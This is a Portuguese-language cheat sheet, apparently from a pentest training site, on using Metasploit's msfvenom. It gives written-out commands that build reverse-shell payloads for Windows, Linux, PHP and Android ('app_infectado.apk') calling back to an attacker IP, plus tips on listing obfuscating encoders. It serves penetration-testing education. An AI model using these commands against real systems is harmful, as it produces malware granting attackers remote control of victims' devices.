Msfvenom | Solyd One
- Msfvenom | Solyd One
📌 MSFVenom – Guia Rápido
O msfvenom é uma ferramenta do Metasploit Framework usada para gerar payloads (códigos maliciosos de teste) em diversos formatos. ⚠️ Uso apenas em ambientes controlados e autorizados (laboratórios, testes de penetração legais).
🔹 Sintaxe básica
msfvenom -p <payload> LHOST=<IP_atacante> LPORT=<porta> -f <formato> -o <arquivo>
-p→ Tipo de payload (ex:windows/meterpreter/reverse_tcp)LHOST→ IP do atacante (quem vai receber a conexão)LPORT→ Porta de escuta-f→ Formato de saída (exe, elf, apk, php, asp, raw, c, python, etc.)- Documentação sobre formatos: 🔗 Clique aqui
-o→ Nome do arquivo gerado
🔹 Exemplos práticos
1. Windows Reverse Shell (EXE)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o shell.exe
2. Linux Reverse Shell (ELF)
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f elf -o shell.elf
3. Payload em PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw -o shell.php
4. Payload para Android (APK)
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 R > app_infectado.apk
🔹 Dicas úteis
-
Listar todos os payloads disponíveis:
msfvenom -l payloads -
Listar formatos de saída:
msfvenom -l formats -
Encoders para ofuscar o payload:
msfvenom -l encoders